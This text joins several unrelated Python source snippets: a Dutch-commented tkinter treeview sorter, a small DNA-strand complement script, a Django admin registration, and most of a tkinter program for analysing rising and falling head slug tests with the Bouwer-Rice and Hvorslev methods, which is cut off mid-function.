"""Deze functie sorteert de koppen van de treeview als er op de kop is gedrukt"""
koppenlijst = []
for kop in self.treeview.get_children(''):
koppenlijst.append(kop)
copylijst = koppenlijst.copy()
copylijst.reverse()
for kop in koppenlijst:
self.treeview.move(kop, '', copylijst.index(kop))
self.needs2bsorted = not self.needs2bsorted
def sort_column_noclick(self):
""" Deze fucntie sorteert de kolommen als dat nodig is en de vriendlijst wordt refreshed."""
koppenlijst = []
for kop in self.treeview.get_children(''):
koppenlijst.append(kop)
copylijst = koppenlijst.copy()
if self.needs2bsorted:
copylijst.reverse()
for kop in koppenlijst:
self.treeview.move(kop, '', copylijst.index(kop))
def open_statistiek(self):
""" Deze functie opent het statistiekscherm"""
self.stop_sensoren(True)
self.clear_gui(True)
self.neopixel.lights_out()
self.favoriet = "begin"
Statistiek(self.client, self.root, self)
|
dna_strand_1= "ATC-CGG-GAC-CAG-CIG-GCC-GTC" #TAG-GCC-CTG-GTC-GAC-CGG-CAG
dna_strand_2 = ""
for x in range(len(dna_strand_1)):
char = dna_strand_1[x]
print(char,end = "',")
if char == "A":
dna_strand_2 +="I"
if char == "I":
dna_strand_2 += "A"
if char == "C":
dna_strand_2 +="G"
if char == "G":
dna_strand_2 +="C"
else:
dna_strand_2 +=char
print (dna_strand_2)
|
from django.contrib import admin
from .models import Customer, Shouhin, Accounting
# Register your models here.
admin.site.register(Customer)
admin.site.register(Shouhin)
admin.site.register(Accounting) |
# -*- coding: utf-8 -*-
"""
For analysis of rising head slug tests
Documentation: RSAT_0.2.2_usermanual.pdf
Written in python 3.7 by Annabel Vaessens and Gert Ghysels
January 2020
#"""
import time
import itertools
import math
import matplotlib.pyplot as plt
import matplotlib.backends.backend_tkagg as pltb
import numpy as np
import os
import pandas as pd
import string
import tkinter as tk
########################### FUNCTIONS ###############################
class Program:
def newDirectory(self): #changes the directory: this will be the map that opens when opening and saving files
self.newDirectory= tk.filedialog.askdirectory()
tk.Label(GUI, text=self.newDirectory[-35:],font=("Helvetica", "8"), width='32', foreground='navy').grid(row=i-1, column=j)
os.chdir(self.newDirectory)
def OpenFile(self): # opens file where the horizontal hydraulic conductivity calculations are performed on
self.ListNamesCols=[]
filenameDir=tk.filedialog.askopenfilename(filetypes = [("DAT files","*.dat"),("All Files","*")])
self.RAWDATA=pd.read_csv(filenameDir,decimal=',',delim_whitespace=True,header=None, names=['Time [T]','Transducer [(M*L²)/(T³*I)]','Head [L, non SI]','Head [L]','Pressure [M/(T²*L)]'])
try:
self.dfRAWDATA=pd.DataFrame(self.RAWDATA.astype(float))
except ValueError:
tk.messagebox.showerror("Warning", "The input file contains characters, which cannot be converted to float (literals or wrong/mixed decimal seperators) \nOnly '.' OR ',' are allowed as seperator!")
self.filename=str(filenameDir.split('/')[-1]) # gives the file name you have selected
self.ListNamesCols=['Time [T]', self.filename]
tk.Label(GUI, text=self.filename,font=("Helvetica", "9"), foreground='navy').grid(row=i+1, column=j)
def SaveFig(self): # to save figures that are created
NameFig=tk.filedialog.asksaveasfilename(title= 'Save as', confirmoverwrite=True, initialdir=self.newDirectory)
self.Figure.savefig(NameFig + '.pdf', bbox_inches='tight')
def Canvas(self, figure, m, r, c): # to make a canvas and display the figure in a pop-up window
canvas = pltb.FigureCanvasTkAgg(figure, master=m)
canvas.draw()
canvas.get_tk_widget().grid(row=r, column=c)
def PlotDataSeperateBox(self): # plots the imported data in a pop-up window
box = tk.Toplevel(background='#B4D0E9', cursor='crosshair')
box.title("Data "+ self.filename )
FigRawData = plt.figure(figsize=(13,8),facecolor='#B4D0E9')
plt.title(self.filename, fontsize=16)
ax1 = FigRawData.add_subplot(111)
self.dfRAWDATA.plot(x='Time [T]', y='Head [L]',ax=ax1)
plt.ylabel('Head [L]', fontsize=14)
plt.xlabel('Time [T]', fontsize=14)
plt.axis([self.dfRAWDATA.iloc[0,0]-len(self.dfRAWDATA)/60,self.dfRAWDATA.iloc[-1,0]+len(self.dfRAWDATA)/60,min(self.dfRAWDATA.iloc[:,3])-20,max(self.dfRAWDATA.iloc[:,3])+20])
self.Canvas(FigRawData,box, 0,0)
self.Figure=FigRawData # for using in the save-function
tk.Button(box, text="Save figure", command=self.SaveFig, width=10).grid(row=2,column=2) # option to save the figure
tk.Button(box, text="Close", command=box.destroy, width=10).grid(row=3,column=2) # option to close the pop up window
# making a clickable graph in a pop-up window, where the boundaries of individual measurements can be clicked
def ClickableGraph(self):
self.PlotDataSeperateBox()
self.NumPoints=int(NM.get())*2 # two times the amount of measurements need to be clicked
BoundPoints1=list(plt.ginput(self.NumPoints, show_clicks=True)) # list makes a list of the tuple that ginput gives
self.BoundPoints=list(itertools.chain.from_iterable(BoundPoints1))
# splitting the imported data in individual measurements with the clicks defined in ClickableGraph()
def SplitRawData(self):
x=0
y=1
while (x < len(self.BoundPoints)-1): #(len(BoundPoints)-1)/4 is the amount of repetitions needed, this is equal to the amount of measurements
DistFirstPoint=[]
DistSecondPoint=[]
RAWDATASliced=[]
for P in range(0,self.dfRAWDATA.count(axis='rows')[0]):
DistFirstPoint.append(math.sqrt((self.BoundPoints[x]-self.dfRAWDATA.iloc[P,0])**2 + (self.BoundPoints[y]-self.dfRAWDATA.iloc[P, 3])**2 ))
DistSecondPoint.append(math.sqrt((self.BoundPoints[x+2]-self.dfRAWDATA.iloc[P,0])**2 +(self.BoundPoints[y+2]-self.dfRAWDATA.iloc[P, 3])**2 ))
FirstPoint_Data=min(DistFirstPoint)
SecondPoint_Data=min(DistSecondPoint)
IndexFirstPoint=DistFirstPoint.index(FirstPoint_Data)
IndexSecondPoint=DistSecondPoint.index(SecondPoint_Data)
RAWDATASliced=self.dfRAWDATA[IndexFirstPoint:IndexSecondPoint+1]
self.RepeatMeas=list(string.ascii_uppercase)
RAWDATASliced.to_csv(self.filename[:-4]+'_proc'+self.RepeatMeas[int(x/4)]+'.dat', header=False, index=False, sep=' ')
x=x+4
y=y+4
tk.messagebox.showinfo('Info', 'Splitting in individual measurements was successful. You can find them in the current working directory.')
# function that opens multiple (or one) individual measurements, let the user define location of the baselevel and splits the data (from the minimum head to the recovered head or end of the data)
def RepeatabilityOpen(self):
self.BaseLevelList=[]
self.BaseLevelListLL=[]
self.listNamesRepMeas_H=[] # list with only the names of the columns containing head data
self.listNamesRepMeas_TH=[] # list with the column names of the repeated measurements that were selected
self.Q=0
self.H0_Blist=[]
try:
filenameDir=tk.filedialog.askopenfilenames(filetypes = [("DAT files","*.dat"),("All Files","*")])
filenameDirList=list(filenameDir)
self.DFSlicedNormHead_Rep=pd.DataFrame()
while self.Q < len(filenameDirList):
self.DATA=pd.read_csv(filenameDirList[self.Q],decimal=',',delim_whitespace=True,header=None, names=['Time [T]','Transducer [(M*L²)/(T³*I)]','Head [L, non SI]','Head [L]','Pressure [M/(T²*L)]'])
self.dfDATA=pd.DataFrame(self.DATA.astype(float))
filenameRepeat=str((filenameDir[self.Q].split('/')[-1]).split('.')[0])
self.listNamesRepMeas_H.append(filenameRepeat)
self.listNamesRepMeas_TH.append('Time_'+filenameRepeat)
self.listNamesRepMeas_TH.append(filenameRepeat)
tk.Label(GUI, text=filenameRepeat,font=("Helvetica", "9"), foreground='navy').grid(row=i+11+self.Q, column=j+1, columnspan=2, sticky='W')
#open a new pop-up window
box2 = tk.Toplevel(background='#B4D0E9', cursor='crosshair')
box2.title("Data "+ filenameRepeat+ ' -- Indicate the last baselevel value')
FigRepBaselvl = plt.figure(figsize=(13,8),facecolor='#B4D0E9')
plt.title('Indicate the last baselevel value', fontsize=16)
ax2 = FigRepBaselvl.add_subplot(111)
self.dfDATA.plot(x='Time [T]', y='Head [L]',ax=ax2)
plt.xlabel('Time [T]', fontsize=14)
plt.ylabel('Head [L]', fontsize=14)
self.Canvas(FigRepBaselvl, box2, 0,0)
BaseLevel=list(itertools.chain.from_iterable(plt.ginput(1, show_clicks=True)))
self.BaseLevelListLL.append(BaseLevel)
self.BaseLevelList= [val for sublist in self.BaseLevelListLL for val in sublist]
self.SplitProcData()
box2.destroy()
self.Q=self.Q+1
self.DFSlicedNormHead_Rep.columns=self.listNamesRepMeas_TH
except ValueError:
tk.messagebox.showerror("Warning", "The input file contains characters, which cannot be converted to float (literals or wrong/mixed decimal seperators) \nOnly '.' OR ',' are allowed as seperator!")
# used in RepeatabilityOpen; splits the data file into the part used for the normhead-time curves (from the minimum head to the recovered head or end of the data)
def SplitProcData(self):
self.DFSlicedNormHead_Rep_1Meas=pd.DataFrame()
DistBaseLevel=[]
for P in range(0,self.dfDATA.count(axis='rows')[0]):
DistBaseLevel.append(math.sqrt((self.BaseLevelList[self.Q*2]-self.dfDATA.iloc[P,0])**2 + (self.BaseLevelList[(self.Q*2)+1]-self.dfDATA.iloc[P,3])**2 )) #oke
MinDistBaseLevel=min(DistBaseLevel)
IndexMinDistBaseLevel=DistBaseLevel.index(MinDistBaseLevel)
BaseLevel=np.mean(self.dfDATA.iloc[IndexMinDistBaseLevel-10:IndexMinDistBaseLevel,3]) # baselevel is average of ten points before the clicked point
if STlabel.get()=='F': # falling head slug tests
StartHead2=max(self.dfDATA.iloc[:,3]) # maximum of the dataset if it is falling head slug test
IndexStart2=self.dfDATA['Head [L]'].idxmax()
k=IndexStart2
while (self.dfDATA.iloc[k,3]>= BaseLevel) and (self.dfDATA.iloc[k,3] > self.dfDATA.iloc[-1,3]):
k=k+1
if self.dfDATA.iloc[k,3] > BaseLevel:
tk.messagebox.showinfo("Warning", "Recovery is not reached for this measurement")
if STlabel.get()=='R': # for rising head slug tests
StartHead2=min(self.dfDATA.iloc[:,3])
IndexStart2=self.dfDATA['Head [L]'].idxmin()
k=IndexStart2
while (self.dfDATA.iloc[k,3]<= BaseLevel) and (self.dfDATA.iloc[k,3] < self.dfDATA.iloc[-1,3]):
k=k+1
if self.dfDATA.iloc[k,3] < BaseLevel:
tk.messagebox.showinfo("Warning", "Recovery is not reached for this measurement")
self.H0_B=BaseLevel-StartHead2
self.H0_Blist.append(self.H0_B)
self.DFSlicedNormHead_Rep_1Meas[self.listNamesRepMeas_TH[2*self.Q]]=self.dfDATA.iloc[IndexStart2:k,0]
self.DFSlicedNormHead_Rep_1Meas[self.listNamesRepMeas_TH[2*self.Q+1]]=self.dfDATA.iloc[IndexStart2:k,3]
for w in range (0,k-IndexStart2):
self.DFSlicedNormHead_Rep_1Meas.iloc[w,1]=(BaseLevel-self.DFSlicedNormHead_Rep_1Meas.iloc[w,1])/(BaseLevel- StartHead2) # normalized head of the sliced part (minhead to baselevel)
self.DFSlicedNormHead_Rep_1Meas.iloc[w,0]=self.DFSlicedNormHead_Rep_1Meas.iloc[w,0]-self.dfDATA.iloc[IndexStart2,0] # we need the time for each measurement in order to plot measurements with different frequencies on one graph
self.DFSlicedNormHead_Rep=pd.concat((self.DFSlicedNormHead_Rep, self.DFSlicedNormHead_Rep_1Meas),ignore_index=True, axis=1)
# general settings to plot the normalized head vs time curves in a pop-up window
# used in PlotNormHead_Time() and PlotNormHead_LogTime()
def Multi_plot(self, title,label,xscale):
box3 = tk.Toplevel(background='#B4D0E9')
box3.title( title +" "+", ".join(str(x) for x in self.listNamesRepMeas_H))
RepFig = plt.figure(figsize=(13,8),facecolor='#B4D0E9') # RepFig stands for 'Repeated measurements figures'
plt.title(label, fontsize=16)
ax4 = RepFig.add_subplot(111)
ax4.set(xscale = xscale )
plt.xlabel('Time [T]', fontsize=14)
plt.ylabel('Normalized head [-]', fontsize=14)
i=0
for i in range(0, len(self.listNamesRepMeas_TH)-1,2):
plt.plot(self.DFSlicedNormHead_Rep[self.listNamesRepMeas_TH[i]], self.DFSlicedNormHead_Rep[self.listNamesRepMeas_TH[i+1]]) # plotting in this way makes the frequency of the data incorporated by itself
plt.legend(self.listNamesRepMeas_H, fontsize='large')
self.Canvas(RepFig,box3,1,0)
self.Figure=RepFig # to use in SaveFig-function
tk.Button(box3, text="Save figure", command=self.SaveFig, width=10).grid(row=2,column=2)
tk.Button(box3, text="Close", command=box3.destroy, width=10).grid(row=3,column=2)
def PlotNormHead_Time(self): # specific settings for the normalized head vs time curves
title = 'Normalized head versus time for'
label = 'Normalized Head versus time'
xscale='linear'
self.Multi_plot(title,label,xscale)
def PlotNormHead_LogTime(self): # specific settings for the normalized head vs log(time) curves
title = 'Normalized head versus time on semilog diagram for'
label = 'Plot normalized nead versus time on semilog diagram'
xscale='log'
self.Multi_plot(title,label,xscale)
# Bouwer-Rice calculations for unconfined aquifer, partially penetrating well
# used in PerformCalc()
def KhBouwerRice_PP(self):
coeff=math.log((self.AqThick-(self.d+self.Le))/(self.rw*math.sqrt(self.Aniso)))
if coeff > 6:
coeff=6
A = 1.4720 + 0.03537*(self.Le/(self.rw*math.sqrt(self.Aniso)))-0.00008148*(self.Le/(self.rw*math.sqrt(self.Aniso)))**2+0.0000001028*(self.Le/(self.rw*math.sqrt(self.Aniso)))**3-0.00000000006484*(self.Le/(self.rw*math.sqrt(self.Aniso)))**4+0.00000000000001573*(self.Le/(self.rw*math.sqrt(self.Aniso)))**5
B = 0.2372 + 0.005151*(self.Le/(self.rw*math.sqrt(self.Aniso))) - 0.000002682*(self.Le/(self.rw*math.sqrt(self.Aniso)))**2 - 0.0000000003491*(self.Le/(self.rw*math.sqrt(self.Aniso)))**3 + 0.0000000000004738*(self.Le/(self.rw*math.sqrt(self.Aniso)))**4
self.Kh_BR_PP=self.rc*self.rc*(1.1/math.log((self.d+self.Le)/(self.rw*math.sqrt(self.Aniso)))+((A+(B*coeff))/self.Le*self.rw*math.sqrt(self.Aniso)))**(-1)/(2*self.Le*self.T01)
self.Kh_BR_PP=round(self.Kh_BR_PP,5) # rounding off to five decimals
# Bouwer-Rice calculations for unconfined aquifer, fully penetrating well, used in PerformCalc()
def KhBouwerRice_FP(self):
C=0.7920+0.03993*(self.Le/(self.rw*math.sqrt(self.Aniso)))-0.00005743*(self.Le/(self.rw*math.sqrt(self.Aniso)))**2+0.00000003858*(self.Le/(self.rw*math.sqrt(self.Aniso)))**3-0.000000000009659*(self.Le/(self.rw*math.sqrt(self.Aniso)))**4
self.Kh_BR_FP=self.rc*self.rc*(1.1/math.log((self.d+self.Le)/(self.rw*math.sqrt(self.Aniso)))+(C/self.Le*self.rw*math.sqrt(self.Aniso)))**(-1)/(2*self.Le*self.T01)
self.Kh_BR_FP=round(self.Kh_BR_FP,5 )
# Hvorslev calculations for confined aquifer, partially penetrating well
def KhHvorslev_PP(self):
F=1/(2*math.sqrt(self.Aniso)/(self.Le/self.rw)) + math.sqrt(1 + (1/(2*math.sqrt(self.Aniso)/(self.Le/self.rw)))**2)
self.Kh_H_PP = (self.rc*self.rc*math.log(F)) / (2*self.Le*self.T01)
self.Kh_H_PP=round(self.Kh_H_PP,5)
# Hvorslev calculations for confined aquifer, fully penetrating well
def KhHvorslev_FP(self):
self.Kh_H_FP=(self.rc*self.rc*math.log(self.re/self.rw))/(2*self.AqThick*self.T01)
self.Kh_H_FP=round(self.Kh_H_FP,5)
# pop-up window for the user to define the baselevel
# used in PerformCalc()
def DefBaseLevel(self):
box4 = tk.Toplevel(background='#B4D0E9', cursor='crosshair')
box4.title("Data "+ self.filename + ' -- Indicate the last baselevel value')
FigBaselvl = plt.figure(figsize=(13,8),facecolor='#B4D0E9')
plt.title('Indicate the last baselevel value '+ self.filename, fontsize=16)
ax5 = FigBaselvl.add_subplot(111)
self.dfRAWDATA.plot(x='Time [T]', y='Head [L]',ax=ax5)
plt.xlabel('Time [T]', fontsize=14)
plt.ylabel('Head [L]', fontsize=14)
self.Canvas(FigBaselvl, box4,0,0)
self.EstBaseLevel=list(itertools.chain.from_iterable(plt.ginput(1, show_clicks=True)))
box4.destroy()
# for checking whether there are limitations for certain methods.
# used in the button 'Check limitations'
def CheckLimitations(self):
self.DefBaseLevel()
DistBaseLevel=[]
for P in range(0,self.dfRAWDATA.count(axis='rows')[0]):
DistBaseLevel.append(math.sqrt((self.EstBaseLevel[0]-self.dfRAWDATA.iloc[P,0])**2 + (self.EstBaseLevel[1]-self.dfRAWDATA.iloc[P,3])**2 )) #oke
MinDistBaseLevel=min(DistBaseLevel)
IndexMinDistBaseLevel=DistBaseLevel.index(MinDistBaseLevel)
self.BaseLevel=np.mean(self.dfRAWDATA.iloc[IndexMinDistBaseLevel-10:IndexMinDistBaseLevel,3])
if STlabel.get()=='F': # for falling head slug tests
self.StartHead=max(self.dfRAWDATA.iloc[:,3])
self.H0=self.BaseLevel-self.StartHead
IndexStart=self.dfRAWDATA.iloc[:,3].idxmax()
k=IndexStart
while (self.dfRAWDATA.iloc[k,3]>= self.BaseLevel) and (self.dfRAWDATA.iloc[k,3] > self.dfRAWDATA.iloc[-1,3]):
k=k+1
if STlabel.get()=='R': # for rising head slug tests
self.StartHead=min(self.dfRAWDATA.iloc[:,3])
self.H0=self.BaseLevel-self.StartHead
IndexStart=self.dfRAWDATA.iloc[:,3].idxmin()
k=IndexStart
while (self.dfRAWDATA.iloc[k,3]<= self.BaseLevel) and (self.dfRAWDATA.iloc[k,3] < self.dfRAWDATA.iloc[-1,3]):
k=k+1
self.DFSlicedNormHead=pd.DataFrame([self.dfRAWDATA.iloc[IndexStart:k,0], self.dfRAWDATA.iloc[IndexStart:k,3]], index=self.ListNamesCols)
self.DFSlicedNormHead=self.DFSlicedNormHead.transpose()
for w in range (0,k-IndexStart):
self.DFSlicedNormHead.iloc[w,1]=(self.BaseLevel-self.DFSlicedNormHead.iloc[w,1])/(self.H0) # normalized head of the sliced part (minhead to baselevel)
self.DFSlicedNormHead.iloc[w,0]=self.DFSlicedNormHead.iloc[w,0]-self.dfRAWDATA.iloc[IndexStart,0] # start time for each measurement should be zero in order to plot measurements with different frequencies on one graph
if self.DFSlicedNormHead.iloc[-1,1]>0.30:
tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement. Maximum normalized head is "+ str(round(self.DFSlicedNormHead.iloc[-1,1],2)) + ', "No full recovery" and "All data" methods are limited to the range 1 - '+ str(round(self.DFSlicedNormHead.iloc[-1,1],2)) + '. No "Best range" methods can be calculated.')
elif self.DFSlicedNormHead.iloc[-1,1]>0.25:
tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement. Maximum normalized head is "+ str(round(self.DFSlicedNormHead.iloc[-1,1],2)) + '. Hvorslev best range cannot be calculated.' +' "All data" and "Bouwer-Rice best range" methods are limited to the range 1 - '+ str(round(self.DFSlicedNormHead.iloc[-1,1],2)))
elif self.DFSlicedNormHead.iloc[-1,1]>0.20:
tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement. Maximum normalized head is "+ str(round(self.DFSlicedNormHead.iloc[-1,1],2)) + '. "All data" methods are limited to the range 1 - '+str(round(self.DFSlicedNormHead.iloc[-1,1],2)) +', best range for Bouwer-Rice is limited to the range 0.30 - '+str(round(self.DFSlicedNormHead.iloc[-1,1],2)) + ', "Hvorslev best range" method is limited to 0.25 - '+str(round(self.DFSlicedNormHead.iloc[-1,1],2))+ '.')
elif self.DFSlicedNormHead.iloc[-1,1]>0.15:
tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement. Maximum normalized head is "+ str(round(self.DFSlicedNormHead.iloc[-1,1],2)) + '. "All data" methods are limited to the range 1 - '+str(round(self.DFSlicedNormHead.iloc[-1,1],2))+ ', Hvorlsev best range is limited to the range 0.25 - '+str(round(self.DFSlicedNormHead.iloc[-1,1],2))+ '.')
elif self.DFSlicedNormHead.iloc[-1,1]>0.035:
tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement, but all calculation methods are possible.")
else:
tk.messagebox.showinfo("Info", "Recovery is reached for this measurement. No limitations for calculation methods")
# splits the data and calculates the log of the normalized heads
# used in PerformCalc()
def SplitProcDataForCalc(self):
DistBaseLevel=[]
for P in range(0,self.dfRAWDATA.count(axis='rows')[0]):
DistBaseLevel.append(math.sqrt((self.EstBaseLevel[0]-self.dfRAWDATA.iloc[P,0])**2 + (self.EstBaseLevel[1]-self.dfRAWDATA.iloc[P,3])**2 ))
MinDistBaseLevel=min(DistBaseLevel)
IndexMinDistBaseLevel=DistBaseLevel.index(MinDistBaseLevel)
self.BaseLevel=np.mean(self.dfRAWDATA.iloc[IndexMinDistBaseLevel-10:IndexMinDistBaseLevel,3])
if STlabel.get()=='F':# for falling head
self.StartHead=max(self.dfRAWDATA.iloc[:,3])
IndexStart=self.dfRAWDATA.iloc[:,3].idxmax()
k=IndexStart
while (self.dfRAWDATA.iloc[k,3] >= self.BaseLevel) and (self.dfRAWDATA.iloc[k,3] > self.dfRAWDATA.iloc[-1,3]):
k=k+1
if self.dfRAWDATA.iloc[k,3] > self.BaseLevel:
tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement")
if STlabel.get()=='R':# for rising head
self.StartHead=min(self.dfRAWDATA.iloc[:,3])
IndexStart=self.dfRAWDATA.iloc[:,3].idxmin()
k=IndexStart
while (self.dfRAWDATA.iloc[k,3]<= self.BaseLevel) and (self.dfRAWDATA.iloc[k,3] < self.dfRAWDATA.iloc[-1,3]):
k=k+1
if self.dfRAWDATA.iloc[k,3] < self.BaseLevel:
tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement")
self.H0=self.BaseLevel-self.StartHead
self.DFSlicedNormHead=pd.DataFrame([self.dfRAWDATA.iloc[IndexStart:k,0], self.dfRAWDATA.iloc[IndexStart:k,3]], index=self.ListNamesCols)
self.DFSlicedNormHead=self.DFSlicedNormHead.transpose()
for w in range (0,k-IndexStart):
self.DFSlicedNormHead.iloc[w,1]=(self.BaseLevel-self.DFSlicedNormHead.iloc[w,1])/(self.H0) # normalized head of the sliced part (minhead to baselevel)
self.DFSlicedNormHead.iloc[w,0]=self.DFSlicedNormHead.iloc[w,0]-self.dfRAWDATA.iloc[IndexStart,0] # start time for each measurement should be zero in order to plot measurements with different frequencies on one graph
# slicing the normalized heads list to the desired ranges for the calculations and taking the logs that are used in the linear regression:
self.DFSlicedNormHead_All=self.DFSlicedNormHead[(self.DFSlicedNormHead[self.ListNamesCols[1]]>=0.035)&(self.DFSlicedNormHead[self.ListNamesCols[1]]<=1)]
if (V3.get()==True) or (V6.get()==True) or (V9.get()==True) or (V12.get()==True):
self.DFSlicedLogNormHead_All=self.DFSlicedNormHead_All.copy() # copy() is needed for not overwriting the original dataframe
self.DFSlicedLogNormHead_All[self.ListNamesCols[1]]=self.DFSlicedNormHead_All[self.ListNamesCols[1]].map(lambda a: math.log(a))
if (V1.get()==True) or (V4.get()==True):
self.DFSlicedNormHead_RangeBR=self.DFSlicedNormHead[(self.DFSlicedNormHead[self.ListNamesCols[1]]>=0.2)&(self.DFSlicedNormHead[self.ListNamesCols[1]]<=0.3)]
self.DFSlicedLogNormHead_RangeBR=self.DFSlicedNormHead_RangeBR.copy()
self.DFSlicedLogNormHead_RangeBR[self.ListNamesCols[1]]=self.DFSlicedNormHead_RangeBR[self.ListNamesCols[1]].map(lambda a: math.log(a))
if (V7.get()==True) or (V10.get()==True):
self.DFSlicedNormHead_RangeH=self.DFSlicedNormHead[(self.DFSlicedNormHead[self.ListNamesCols[1]]>=0.15)&(self.DFSlicedNormHead[self.ListNamesCols[1]]<=0.25)]
self.DFSlicedLogNormHead_RangeH=self.DFSlicedNormHead_RangeH.copy()
self.DFSlicedLogNormHead_RangeH[self.ListNamesCols[1]]=self.DFSlicedNormHead_RangeH[self.ListNamesCols[1]].map(lambda a: math.log(a))
if (V2.get()==True) or (V5.get()==True) or (V8.get()==True) or (V11.get()==True):
self.DFSlicedNormHead_Begin=self.DFSlicedNormHead[(self.DFSlicedNormHead[self.ListNamesCols[1]]>=0.3)&(self.DFSlicedNormHead[self.ListNamesCols[1]]<=1)]
self.DFSlicedLogNormHead_Begin=self.DFSlicedNormHead_Begin.copy()
self.DFSlicedLogNormHead_Begin[self.ListNamesCols[1]]=self.DFSlicedNormHead_Begin[self.ListNamesCols[1]].map(lambda a: math.log(a))
# determines the linear regression coefficients for the corresponding range of selected data (All data/ 0.20-0.30/ 0.15-0.25 /0.3-1)
# used in Performalc()
def LinearRegression(self,DFSlicedLogNormHead_X):
self.LinRegCoef=np.polyfit(DFSlicedLogNormHead_X[self.ListNamesCols[0]], DFSlicedLogNormHead_X[self.ListNamesCols[1]],1)
self.H01=math.exp(self.LinRegCoef[1])*self.H0
self.T01=(-1-self.LinRegCoef[1])/self.LinRegCoef[0]
#LinRegCorr=np.corrcoef(DFSlicedLogNormHead_X[ListNamesCols[0]], DFSlicedLogNormHead_X[ListNamesCols[1]])[0,1] # not used, but can be implemented when information regarding the regression fit is wanted
print(self.DFSlicedNormHead)
print(self.LinRegCoef)
self.dfFit=pd.DataFrame([np.array(range(0,len(self.DFSlicedNormHead.index)+1)), [math.exp(i) for i in self.LinRegCoef[0]*np.array(range(0,len(self.DFSlicedNormHead.index)+1)+self.LinRegCoef[1])]], index=self.ListNamesCols)
self.dfFit=self.dfFit.transpose()
# FOR BATCH CALC - determines the linear regression coefficients for the corresponding range of selected data (All data/ 0.20-0.30/ 0.15-0.25 /0.3-1)
# used in BatchCalc()
def LinearRegression_B(self,DFSlicedLogNormHead_X_B):
self.LinRegCoef_B=np.polyfit(DFSlicedLogNormHead_X_B[self.listNamesRepMeas_TH[self.batchfile]], DFSlicedLogNormHead_X_B[self.listNamesRepMeas_TH[self.batchfile+1]],1)
self.H01=math.exp(self.LinRegCoef_B[1])*self.H0_Blist[int(self.batchfile/2)]
self.T01=(-1-self.LinRegCoef_B[1])/self.LinRegCoef_B[0]
self.DFSlicedNormHead_Rep_1=self.DFSlicedNormHead_Rep_1.dropna(axis=0,inplace=False) # drop the Nan values
self.DFSlicedNormHead_Rep_1=self.DFSlicedNormHead_Rep_1.reset_index(drop=True) # reset the index from 0 to #rows
print(self.LinRegCoef_B)
#LinRegCorr=np.corrcoef(DFSlicedLogNormHead_X[ListNamesCols[0]], DFSlicedLogNormHead_X[ListNamesCols[1]])[0,1] # not used, but can be implemented when information regarding the regression fit is wanted
self.dfFit_B=pd.DataFrame([np.array(range(0,len(self.DFSlicedNormHead_Rep_1.index)+1)), [math.exp(i) for i in self.LinRegCoef_B[0]*np.array(range(0,len(self.DFSlicedNormHead_Rep_1.index)+1)+self.LinRegCoef_B[1])]], index=[self.listNamesRepMeas_TH[self.batchfile],self.listNamesRepMeas_TH[self.batchfile+1]])
self.dfFit_B=self.dfFit_B.transpose()
# pop-up window with the regression results
# used in PerformCalc()
def PlotRegResults(self):
box5 = tk.Toplevel(background='#B4D0E9')
box5.title("Regression results for "+ self.filename)
self.PlotRegRes = plt.figure(figsize=(7,7),facecolor='#B4D0E9')
plt.title("Regression results for "+ self.filename, fontsize=16)
self.ax3= plt.subplot(111)
plt.ylabel('Normalized Head [L]', fontsize=14)
plt.xlabel('Time [T]', fontsize=14)
self.DFSlicedNormHead_All.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1], ax=self.ax3, logy=True,color='c')
self.Canvas(self.PlotRegRes, box5,0,0)
# the regression results directly to a pdf (no pop up window)
# used in BatchPerform()
def BatchRegResults(self):
self.PlotRegRes_B = plt.figure(figsize=(7,7),facecolor='#B4D0E9')
plt.title("Regression results for "+ self.listNamesRepMeas_TH[self.batchfile], fontsize=16)
self.ax6= plt.subplot(111)
plt.ylabel('Normalized Head [L]', fontsize=14)
plt.xlabel('Time [T]', fontsize=14)
self.DFSlicedNormHead_Rep_1.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True,color='c')
# shows a pop up window with a table with the calculated hydraulic conductivity values
# used in PerformCalc()
def TableResults(self):
box6 = tk.Toplevel(background='#B4D0E9')
box6.title('Horizontal hydraulic conductivity [L/T] of '+ self.filename+'.')
tk.Label(box6,text='Horizontal hydraulic conductivity [L/T] of ' + self.filename +'.', background='#B4D0E9',font=("Helvetica", "14")).grid(row=0, column=1)
tk.Label(box6, text=' ', width=10, background='#2A6496').grid(row=0, column=0)
TableResults= plt.figure(figsize=(16,5),facecolor='#B4D0E9')
plt.subplot(111)
cell_text = []
for row in range(len(self.ResultsK)):
cell_text.append(self.ResultsK.iloc[row])
ResultsTable=plt.table(cellText=cell_text, rowLabels=self.ResultsK.index, colLabels=self.ResultsK.columns, colWidths=[0.20,0.20,0.20,0.20], loc='center')
ResultsTable.set_fontsize(14)
ResultsTable.scale(1,2)
plt.axis('off')
self.Canvas(TableResults, box6, 1,1)
# checks which calculations options are checked and performs the hydraulic conductivity calculations, shows the results in pop-up windows
def PerformCalc(self):
try:
self.LinearReg_Coeff=[]
self.Aniso=float(ANISO.get())
self.d=float(D.get())
self.Le=float(LE.get())
self.rc=float(RC.get())
self.rw=float(RW.get())
LegendList=['Measurements']
self.DefBaseLevel()
self.SplitProcDataForCalc()
# making results dataframe for hydraulic conductivities
index=['Best range','No full recovery','All data']
self.ResultsK=pd.DataFrame(np.nan,index=index,columns=['Bouwer-Rice, fully p.','Bouwer-Rice, partially p.','Hvorslev, fully p.','Hvorslev, partially p.'])
# making results dataframe for H0 and T0
iterables2=[['Best range','No full recovery','All data'],['H0+','T0+']]
index2 = pd.MultiIndex.from_product(iterables2)
self.ResultsH0T0=pd.DataFrame(np.nan,index=index2,columns=['Bouwer-Rice, fully penetrating','Bouwer-Rice, partially penetrating','Hvorslev, fully pnetrating', 'Hvorslev, partially penetrating'])
self.PlotRegResults()
if V1.get()== True: # if this button is clicked, the calculations are done for the specific method (Bouwer-Rice/Hvorslev) and range (best range, all data, begin of the data)
self.LinearRegression(self.DFSlicedLogNormHead_RangeBR)
self.LinearReg_Coeff.append(self.LinRegCoef[:])
self.ResultsH0T0.iloc[0,0]=self.H01
self.ResultsH0T0.iloc[1,0]=self.T01
self.KhBouwerRice_FP()
